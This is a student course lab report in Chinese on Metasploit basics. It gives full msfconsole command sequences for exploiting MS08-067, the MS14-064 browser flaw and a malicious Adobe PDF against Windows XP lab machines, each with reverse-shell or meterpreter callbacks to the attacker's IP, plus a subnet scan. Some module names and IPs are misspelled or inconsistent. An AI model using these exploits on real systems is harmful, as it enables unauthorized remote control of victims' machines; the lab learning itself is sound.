Exp5 MSF基礎應用

1.基礎問題回答

exploit: 是指攻擊者或滲透測試者利用一個系統、應用或服務中的安全漏洞所進行的攻擊行為, 包括利用緩沖區溢出、Web應用程序漏洞攻擊,以及利用配置錯誤等。按照所利用的安全漏洞所在的位置分為主動滲透攻擊(攻擊某個系統服務),被動滲透攻擊(攻擊某個客戶端應用)。

payload:目標系統在被滲透攻擊之后去執行的代碼一段指令或稱為shellcode。

encode:編碼器,確保攻擊載荷中不會出現滲透攻擊過程中應加以避免的“壞字符”;改變特征碼,對攻擊載荷進行“免殺”處理。


 

2.實驗內容

  2.1一個主動攻擊實踐,如ms08_067; (1分)

 攻擊機:kali linux ip:222.28.141.136

 

 靶機: windows xp [版本 5.1.2600] ip:192.168.33.133 (中文版)

 

使用漏洞:ms08_067


 輸入 use exploit/windows/smb/ms08_067_netapi 

設置payload,tcp反向回連  set payload generic/shell_reverse_tcp 

設置攻擊機ip   set LHOST 222.28.141.136 

設置攻擊端口     set LPORT 4322 

設置靶機ip  set RHOST 192.168.33.133 

設置自動選擇目標系統類型  set target 0 

   攻擊失敗!!!通過網上查找資料,發現可能是打過補丁的原因,更換虛擬機。由于換了網絡,所以第二次實驗時ip也發生了變化。

 

 攻擊機:kali linux ip:192.168.33.132

 

 靶機: windows xp [version 5.1.2600] ip:192.168.33.134

 

 

重復上述步驟:

 

 

  攻擊成功!!!


 

  2.2 一個針對瀏覽器的攻擊,ms14_064;(唯一)

  攻擊機:kali linux ip:192.168.33.132

  靶機: windows xp [version 5.1.2600] ip:192.168.33.134

 

首先,我看了一下有哪些攻擊瀏覽器的漏洞可用

下面還有很多........但是不一定都可用,隨便選擇一個漏洞ms14_064試試。

輸入指令  use exploit/windows/browser/ms14_064_ole_code_execution    //使用瀏覽器ms14_064漏洞

進行如下的配置:

  set payload windows/meterpreter/reverse_http  //http反向回連

  set LHOST 192.168.33.132  //攻擊機ip

  set LPORT 4322  //攻擊端口固定

  set URIPATH 4322hyt  //統一資源標識符路徑設置

在訪問 http://192.168.33.132:8080/4322hyt 時,可見攻擊機出現訪問信息。

  攻擊成功!!!


  2.3 一個針對客戶端的攻擊,如Adobe;(1分)

 攻擊機:kali IP:192.168.119.128

 靶機:windows XP sp2 IP:192.168.119.133

 在攻擊機kali輸入msfconsole進入控制臺,輸入指令: use exloit/windows/fileformat/adobe_u3d_meshdecl 

進行如下配置:

set payload windows/meterpreter/reverse_tcp 

    set LHOST 192.168.33.136  //攻擊機ip

  set LPORT 4322  //攻擊端口

  set FILENAME hyt4322.pdf  //設置生成pdf文件的名字

  exploit  //攻擊

在以上目錄中找到該pdf文件,用共享文件夾共享到自己的主機,再拖到靶機。

在靶機上打開該pdf文件。

 

攻擊者可以看到相應的信息,攻擊成功!!!


 

  2.4 成功應用任何一個輔助模塊。(0.5分)

  使用ARP請求枚舉本地局域網中所有活躍主機

輸入指令: use auxiliary/scanner/discovery/udp_seep 

                   show options 


    將RHOSTS設置為 192.168.33.0/24,即掃描子網號為192.168.33.0的子網內的所有主機

結果掃描了256個主機,4個活躍,其中192.168.33.135是靶機的IP.


 

3.實驗感想

    本次實踐讓我對msf基礎有了更加深入的理解,見識到了它的功能強大性,意識到漏洞庫持續更新的重要性。對msf常用模塊的使用也在一定程度上熟練了一些。同時再遇到一些錯誤時,通過提示,進行猜測,上網查找,解決了不少問題,提高了我獨立思考的能力。